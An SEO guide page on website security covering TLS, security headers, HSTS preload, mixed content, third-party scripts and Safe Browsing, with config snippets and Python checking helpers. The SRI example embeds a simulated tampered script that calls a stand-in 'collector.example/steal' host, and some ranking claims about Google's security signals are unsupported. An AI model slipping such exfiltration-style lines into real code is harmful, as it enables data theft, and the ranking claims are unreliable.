SEO Guide Step 7: Security — What Google Wants in 2026
SEO Guide Step 7: Security
*This is Step 7 of the 13-Step SEO Guide. Security isn't just about protecting users - it directly affects your search rankings. Google has used HTTPS as a ranking signal since 2014, and expectations have risen.*
Most site owners think of security as a binary: "We have SSL, so we're secure." In reality, Google evaluates dozens of security signals. Sites with proper security headers, valid certificates, and no mixed content outrank sites with just a basic SSL certificate — all else being equal.
The good news: most security fixes are one-time configurations. Set them once, and they protect your rankings permanently.
SSL Configuration
SSL (technically TLS) encrypts the connection between your server and visitors. Since 2014, Google has confirmed HTTPS as a ranking signal. In 2026, lacking HTTPS isn't just a ranking problem — Chrome labels HTTP sites as "Not Secure" in the address bar, which damages user trust.
Requirements for a proper SSL configuration:

| Requirement | Why it matters | How to check |
|-------------|----------------|--------------|
| Valid certificate | Expired = browser warning = bounced users | Check the expiry date |
| Full chain | An incomplete chain fails on some devices | SSL Labs test |
| TLS 1.2+ | Older versions have known vulnerabilities | SSL Labs test |
| No SHA-1 signatures | Deprecated; browsers no longer trust it | Certificate details |
| SAN coverage | Both www and non-www must be covered | Certificate details |
| Auto-renewal | Prevents expiry mistakes | Let's Encrypt / hosting provider |

SSL scoring:
100% = Valid certificate + Full chain + TLS 1.3 + Strong ciphers + Auto-renewal
0% = Expired or missing certificate
Common SSL problems:
- Certificate expires without warning — Set up monitoring (Step 6) with an alert 30 days before expiry
- Incomplete certificate chain — The server must send the intermediate certificates, not just the leaf certificate
- Mixed content — HTTPS pages loading HTTP resources (images, scripts, styles)
- Redirect loops — HTTP → HTTPS → HTTP cycles caused by a misconfigured CDN/proxy
- Non-www vs www mismatch — The certificate covers one but not the other
Quick win: Run your site through SSL Labs (ssllabs.com/ssltest). Anything below an "A" has issues you can fix. Most hosting providers fix these with one click.
Security Headers
Security headers are HTTP response headers that tell browsers how to behave when loading your site. They prevent entire classes of attacks — and Google's crawlers check for them.
Essential security headers:
Content Security Policy (CSP)
CSP is the most powerful security header. It tells browsers exactly which resources (scripts, styles, images, fonts) are allowed to load on your pages.

```
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self' https://fonts.gstatic.com; connect-src 'self' https://api.example.com; frame-ancestors 'none';
```

What CSP protects against:
- Cross-site scripting (XSS) attacks
- Data injection attacks
- Clickjacking (via `frame-ancestors`)
- Unauthorized script execution (cryptominers, ad injectors)
CSP rollout process:
- Start with `Content-Security-Policy-Report-Only` (logs violations without blocking)
- Review the reports for 1-2 weeks
- Whitelist the legitimate sources
- Switch to enforcement mode
- Add `report-uri` or `report-to` for ongoing violation monitoring
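The report-review step of the rollout above, as an added Python example (not code from the original guide): it groups Report-Only violation reports by directive and blocked origin so that legitimate sources stand out for allowlisting. The sample bodies, hosts and function names are constructed for illustration; both the legacy `report-uri` and the `report-to` payload shapes are handled.

```python
import json
from collections import Counter
from urllib.parse import urlsplit

# Constructed request bodies, as a report collector endpoint might receive them.
SAMPLE_BODIES = [
    # Legacy report-uri shape
    '{"csp-report": {"effective-directive": "script-src-elem", '
    '"blocked-uri": "https://cdn.example.net/lib.js"}}',
    # Reporting API (report-to) shape: a JSON array of reports
    '[{"type": "csp-violation", "body": {"effectiveDirective": "script-src-elem", '
    '"blockedURL": "https://cdn.example.net/other.js"}}]',
    # Some reports carry only violated-directive, holding the full directive text
    '{"csp-report": {"violated-directive": "style-src \'self\'", "blocked-uri": "inline"}}',
    "not json at all",
]


def normalize(report):
    """Map one report of either shape to (directive, blocked source), or None."""
    if isinstance(report.get("csp-report"), dict):
        body = report["csp-report"]
        directive = body.get("effective-directive") or body.get("violated-directive")
        blocked = body.get("blocked-uri") or ""
    elif report.get("type") == "csp-violation" and isinstance(report.get("body"), dict):
        directive = report["body"].get("effectiveDirective")
        blocked = report["body"].get("blockedURL") or ""
    else:
        return None
    if not directive:
        return None
    url = urlsplit(blocked)
    if url.scheme in ("http", "https") and url.netloc:
        blocked = f"{url.scheme}://{url.netloc}"  # group by origin, drop the path
    return directive.split()[0], blocked or "unknown"


def summarize(bodies):
    """Count violations per (directive, source), most frequent first."""
    counts = Counter()
    for raw in bodies:
        try:
            data = json.loads(raw)
            reports = data if isinstance(data, list) else [data]
            keys = [normalize(r) for r in reports if isinstance(r, dict)]
        except (ValueError, TypeError, AttributeError):
            continue  # malformed body or field of the wrong type: skip it
        counts.update(k for k in keys if k)
    return counts.most_common()
```

An origin that appears often under `script-src-elem` is a candidate for the allowlist; an `inline` entry points at markup that needs a nonce, a hash or refactoring before enforcement is switched on.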
X-Frame-Options
Prevents your site from being embedded in iframes on other domains (clickjacking protection).

```
X-Frame-Options: DENY
```

Or, if you need to allow same-origin framing:

```
X-Frame-Options: SAMEORIGIN
```

X-Content-Type-Options
Prevents browsers from MIME-type sniffing (interpreting a file as a different type than the one declared).

```
X-Content-Type-Options: nosniff
```

This blocks attacks where a .jpg file contains hidden JavaScript that the browser might execute.
Referrer-Policy
Controls how much referrer information is sent when users click a link on your site.

```
Referrer-Policy: strict-origin-when-cross-origin
```

This sends the full URL for same-origin requests but only the origin (domain) for cross-origin requests. It balances analytics needs with privacy.
Permissions-Policy
Controls which browser features (camera, microphone, geolocation, etc.) can be used on your site.

```
Permissions-Policy: camera=(), microphone=(), geolocation=(), payment=()
```

Disabling features you don't use prevents third-party scripts from abusing them.
Security header configuration (Next.js):

```js
// next.config.js
module.exports = {
  async headers() {
    return [{
      source: '/(.*)',
      headers: [
        { key: 'X-Content-Type-Options', value: 'nosniff' },
        { key: 'X-Frame-Options', value: 'SAMEORIGIN' },
        { key: 'Referrer-Policy', value: 'strict-origin-when-cross-origin' },
        { key: 'Permissions-Policy', value: 'camera=(), microphone=(), geolocation=()' },
        { key: 'Strict-Transport-Security', value: 'max-age=31536000; includeSubDomains; preload' },
      ]
    }]
  }
}
```

Security header configuration (Apache .htaccess):

```apache
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "SAMEORIGIN"
Header always set Referrer-Policy "strict-origin-when-cross-origin"
Header always set Permissions-Policy "camera=(), microphone=(), geolocation=()"
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
```

Security header configuration (Nginx):

```nginx
add_header X-Content-Type-Options "nosniff" always;
add_header X-Frame-Options "SAMEORIGIN" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
```

Quick win: Add all 5 headers above to your server configuration. It takes 5 minutes and improves your security posture on every page.
HSTS Preload
HTTP Strict Transport Security (HSTS) tells browsers to always use HTTPS for your site — even before the first request. Without HSTS, the first visit to your site can go over HTTP (vulnerable) before being redirected to HTTPS.
HSTS header:

```
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```

The three directives:

| Directive | What it means |
|-----------|---------------|
| max-age=31536000 | Remember this for 1 year (in seconds) |
| includeSubDomains | Apply to all subdomains |
| preload | Opt in to the browser preload list |

HSTS preload list:
The highest level of HSTS protection. Browsers ship with a built-in list of domains that must always use HTTPS. Submitting your site at hstspreload.org means:
- First-time visitors get HTTPS immediately (no HTTP → HTTPS redirect)
- No window for attackers to downgrade the connection
- Permanent (hard to undo once submitted)
Requirements for HSTS preload:
- Valid HTTPS certificate
- Redirect all HTTP to HTTPS (including subdomains)
- HSTS header with `max-age` >= 31536000
- HSTS header includes `includeSubDomains`
- HSTS header includes `preload`
- All subdomains must support HTTPS
Warning: Only submit for preload if all subdomains are ready. The `includeSubDomains` directive means any HTTP-only subdomain will become unreachable.
Quick win: If you have HTTPS on all subdomains, add the full HSTS header and submit at hstspreload.org. Processing takes a few weeks, but the protection is permanent.
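A pre-submission check of the header-related preload requirements listed above, as an added Python example (not part of the original guide and not hstspreload.org's own validation). It parses a `Strict-Transport-Security` value and reports which requirements fail; the sample headers and function names are constructed.

```python
# Minimum max-age the preload requirements above call for (one year, in seconds).
PRELOAD_MIN_AGE = 31536000

# Constructed response headers for two hypothetical HTTPS sites.
READY = [("Strict-Transport-Security", 'MAX-AGE="63072000"; includeSubDomains; preload')]
SHORT = [("Server", "nginx"), ("strict-transport-security", "max-age=86400; includeSubDomains")]


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into a dict of directives."""
    directives = {}
    for part in value.split(";"):
        name, _, arg = part.strip().partition("=")
        name = name.strip().lower()  # directive names are case-insensitive
        if not name:
            continue  # tolerate a trailing semicolon
        if name in directives:
            raise ValueError(f"duplicate directive: {name}")
        directives[name] = arg.strip().strip('"')  # the value may be quoted
    return directives


def preload_problems(headers):
    """Return the preload requirements that a list of (name, value) headers fails."""
    values = [v for k, v in headers if k.lower() == "strict-transport-security"]
    if not values:
        return ["no Strict-Transport-Security header"]
    try:
        found = parse_hsts(values[0])  # browsers process only the first HSTS header
    except ValueError as exc:
        return [str(exc)]
    problems = []
    age = found.get("max-age", "")
    if not (age.isascii() and age.isdigit()):
        problems.append("max-age missing or not a number")
    elif int(age) < PRELOAD_MIN_AGE:
        problems.append(f"max-age {age} is below {PRELOAD_MIN_AGE}")
    for flag in ("includesubdomains", "preload"):
        if flag not in found:
            problems.append(f"{flag} directive missing")
    return problems
```

The certificate, redirect and subdomain requirements are outside what a single response header can show and still need to be checked separately.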
Vulnerability Scanning
Automated vulnerability scanning surfaces known security issues in your stack before attackers exploit them.
What vulnerability scanning checks:
- Outdated software: WordPress, plugins, JavaScript libraries with known CVEs
- Exposed files: `.env`, `.git`, `wp-config.php`, database dumps
- Information disclosure: Server version headers, debug mode, stack traces
- Default credentials: Admin panels without auth, default passwords
- Open ports/services: Unnecessary services exposed to the internet
- Injection points: Forms without CSRF protection, unsanitized inputs
Common vulnerabilities by platform:

| Platform | Top issue | Fix |
|----------|-----------|-----|
| WordPress | Outdated plugins | Updates + WAF |
| Shopify | Third-party app permissions | Monthly app list audit |
| Next.js | Exposed API routes | Auth middleware + rate limiting |
| Static sites | CDN misconfiguration | Cache rule audit |
| Database | SQL injection | Parameterized queries |

Scan schedule:
- Daily: Automated surface scan (SSL, headers, exposed files)
- Weekly: Dependency vulnerability scan (npm audit, WordPress plugin scanner)
- Monthly: Deep scan with authenticated testing
- On every deploy: Baseline scan
Quick win: Run `npm audit` (Node.js) or check your CMS plugin list for outdated components. Fix critical/high severity issues immediately.
Mixed Content
Mixed content occurs when an HTTPS page loads resources (images, scripts, styles, iframes) over HTTP. This breaks the browser's security indicator.
Types of mixed content:

| Type | Risk | Examples | Browser behavior |
|------|------|----------|------------------|
| Active | High | HTTP script, iframe, CSS | Blocked by default |
| Passive | High | HTTP images, video, audio | Loaded with a warning |

Active mixed content is blocked by modern browsers — meaning your scripts and styles will not load. By contrast, passive mixed content still loads but triggers a security warning.
Finding mixed content:
- Open Chrome DevTools → Console
- Look for "Mixed Content" warnings
- Finally, check with a crawler (Screaming Frog, LANGR)
Common sources of mixed content:
- Hardcoded `http://` URLs in content (blog posts, product descriptions)
- Third-party services loading HTTP resources
- Embeds (old YouTube embeds, social media widgets)
- CSS `background-image` with HTTP URLs
- Fonts loaded over HTTP
Fixing mixed content:

```html
<!-- Bad -->
<img src="http://example.com/image.jpg" />
<!-- Good -->
<img src="https://example.com/image.jpg" />
<!-- Best (protocol-relative, adapts to page protocol) -->
<img src="//example.com/image.jpg" />
```

Database fix (WordPress):

```sql
-- Back up the database first. Rewrites hardcoded http:// URLs in post bodies.
UPDATE wp_posts SET post_content = REPLACE(post_content, 'http://yourdomain.com', 'https://yourdomain.com');
-- Caution: meta_value may hold PHP-serialized data, whose length prefixes REPLACE does not update.
UPDATE wp_postmeta SET meta_value = REPLACE(meta_value, 'http://yourdomain.com', 'https://yourdomain.com');
```

Quick win: Open your homepage in Chrome, press F12, and check the Console tab for mixed content warnings. Fix any that appear — they are visible to Google.
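A scripted version of the console check above, as an added Python example (not from the original guide): it walks a page's HTML, finds `http://` subresources, and labels each one active or passive following the table in this section. The tag lists, the sample page and the `scan` name are assumptions made for illustration, and inline `style` URLs are treated as images.

```python
import re
from html.parser import HTMLParser

# (tag, attribute) pairs that load a subresource, split as in the table above.
ACTIVE = {("script", "src"), ("iframe", "src"), ("link", "href")}
PASSIVE = {("img", "src"), ("video", "src"), ("audio", "src"), ("source", "src")}
CSS_URL = re.compile(r"url\(\s*['\"]?(http://[^'\")\s]+)", re.I)


class MixedContentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, tag, url, line number)

    def handle_starttag(self, tag, attrs):
        line, attrs = self.getpos()[0], dict(attrs)
        rel = (attrs.get("rel") or "").lower()
        for name, value in attrs.items():
            value = (value or "").strip()
            if name == "style":  # inline CSS such as background-image
                for url in CSS_URL.findall(value):
                    self.findings.append(("passive", tag, url, line))
            elif value.lower().startswith("http://"):
                if (tag, name) in PASSIVE:
                    self.findings.append(("passive", tag, value, line))
                # <link> counts only for stylesheets; <a href> links are navigation.
                elif (tag, name) in ACTIVE and (tag != "link" or "stylesheet" in rel):
                    self.findings.append(("active", tag, value, line))


def scan(html):
    """Return every http:// subresource referenced by the given page HTML."""
    scanner = MixedContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page (example.com hosts are placeholders).
SAMPLE = """<html><head>
<link rel="canonical" href="http://example.com/page">
<link rel="stylesheet" href="http://example.com/site.css">
<script src="https://example.com/app.js"></script>
</head><body>
<img src="http://example.com/image.jpg" />
<div style="background-image: url('http://example.com/bg.png')"></div>
<a href="http://example.com/other">link</a>
<script src="http://cdn.example.com/lib.js"></script>
</body></html>"""
```

Resources injected by scripts at runtime do not appear in the static HTML, so the browser console check remains necessary.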
Third-Party Script Risks
Every third-party script you load is a security (and performance) liability. Third-party scripts can:
- Be compromised (supply chain attacks)
- Track your users without consent (GDPR liability)
- Slow down your site (render-blocking, network latency)
- Break functionality (version updates, outages)
- Inject content you can't control (ad scripts gone wrong)
Audit the scripts you load:

| Script | Needed? | Risk | Alternative |
|--------|---------|------|-------------|
| Google Analytics | Usually | Low | Server-side tracking |
| Aggregation tools | Maybe | High | Self-hosted tool |
| Social buttons | Mostly | Medium | Static share links |
| A/B testing | Sometimes | High | Server-side testing |
| Tracking pixels | Marketing decision | High | First-party data |
| Font CDNs | No | Low | Self-hosted fonts |

Reducing the risk of the scripts you do need:
- Subresource Integrity (SRI): Hash verification prevents tampered scripts from loading.

```html
<script src="https://cdn.example.com/lib.js"
        integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxAE+sO0..."
        crossorigin="anonymous"></script>
```

- CSP restrictions: Only allow scripts from known domains
- Sandboxed iframes: Isolate third-party widgets
- Regular audits: Review all external resources monthly
- Monitoring: Alert on new domains serving content on your pages
Quick win: List every `<script>` tag in your HTML that loads from an external domain. Remove anything you don't recognize or don't need. Each removal improves both your security posture and your page speed.
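How the SRI check from the list above decides whether a script may load, as an added Python example (not code from the original guide): it generates an `integrity` value for a file and verifies content against an attribute the way the SRI specification describes, including the rule that only the strongest listed algorithm counts. The script bytes and function names are constructed.

```python
import base64
import hashlib

# Hash algorithms SRI defines, weakest to strongest.
STRENGTH = {"sha256": 0, "sha384": 1, "sha512": 2}


def sri_digest(content: bytes, alg: str = "sha384") -> str:
    """Build an integrity token such as 'sha384-<base64 digest>'."""
    digest = hashlib.new(alg, content).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(integrity: str, content: bytes) -> bool:
    """Check content against an integrity attribute value."""
    tokens = []
    for token in integrity.split():
        alg, _, value = token.partition("-")
        alg = alg.lower()
        value = value.split("?", 1)[0]  # drop optional ?options
        if alg in STRENGTH and value:
            tokens.append((alg, value))  # unknown algorithms are ignored
    if not tokens:
        return True  # no usable metadata: the resource loads unchecked
    strongest = max(tokens, key=lambda t: STRENGTH[t[0]])[0]
    expected = {value for alg, value in tokens if alg == strongest}
    actual = sri_digest(content, strongest).split("-", 1)[1]
    return actual in expected


# Constructed example: pin a script, then simulate a modified copy on the CDN.
ORIGINAL = b"console.log('lib v1');"
TAMPERED = ORIGINAL + b"fetch('https://collector.example/steal');"
PIN = sri_digest(ORIGINAL)
```

An attribute that contains only unsupported algorithms gives no protection, which is why the pin should be regenerated with `sha384` or `sha512` whenever the vendor ships a new version.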
Malware Detection & Google Safe Browsing
Google maintains the Safe Browsing list of websites known to serve malware or host phishing content. Being listed there is an SEO killer — Google shows a full-page warning before letting users proceed to your site.
How sites end up on the list:
- A compromised site serving malware (hacked WordPress, etc.)
- Injected scripts redirecting visitors to malicious sites
- Unwanted software downloads hosted on your domain
- User-generated content linking to malware
- Hosting files known to be dangerous
Check your Safe Browsing status:

```
https://transparencyreport.google.com/safe-browsing/search?url=yourdomain.com
```

Or in Google Search Console, in the Security Issues section.
Prevention:
- Keep all software up to date (CMS, plugins, libraries)
- Use strong, unique admin passwords with 2FA
- Monitor file integrity (detect unauthorized changes)
- Scan user-uploaded content
- Remove unused plugins/themes
- Review admin users regularly
If you get flagged:
- Find and remove the malware/phishing content
- Update all software and change all passwords
- Request a review in Google Search Console
- Reviews typically take 1-3 days
- Monitoring continues for up to 30 days (watch for reinfection)
Quick win: Check your site at transparencyreport.google.com. If it's clean, make sure your CMS and all plugins are up to date.
Security SEO Checklist
- [ ] Valid SSL certificate with auto-renewal
- [ ] HTTP → HTTPS redirect on all pages (301, not 302)
- [ ] HSTS header with max-age >= 31536000
- [ ] Content-Security-Policy header configured
- [ ] X-Content-Type-Options: nosniff
- [ ] X-Frame-Options: DENY or SAMEORIGIN
- [ ] Referrer-Policy: strict-origin-when-cross-origin
- [ ] Permissions-Policy disabling unused features
- [ ] No mixed content (HTTP resources on HTTPS pages)
- [ ] No exposed sensitive files (.env, .git, backup files)
- [ ] Server version headers removed or masked
- [ ] All software/plugins updated
- [ ] Google Safe Browsing status: clean
- [ ] Third-party scripts audited and minimized
- [ ] SRI hashes on high-risk third-party scripts
Common Security Issues (Ranked by SEO Impact)
- Expired SSL certificate — Hurts rankings and triggers a browser warning
- Mixed content — Erodes trust and breaks page rendering
- No HSTS — The first request is unprotected, signalling a weak security posture
- No CSP — Any script is allowed to run (XSS vector)
- Exposed files — `.env` contains API keys, `.git` contains source code
- Outdated plugins/CMS — Known exploits, eventual compromise
- No security headers at all — Signals that security is not a priority
- Over-permissive third-party scripts — A security surface you can't control
What's Next?
Step 8: AI Visibility — protecting your SEO in 2026. How to get picked up by Google AI Overview, ChatGPT citations, Perplexity references, and Gemini — the channels that are hardest to crack and that most competitors haven't started watching.
This guide is part of LANGR's 13-Step SEO Guide series. Run a free audit to see where your site stands across all 13 areas.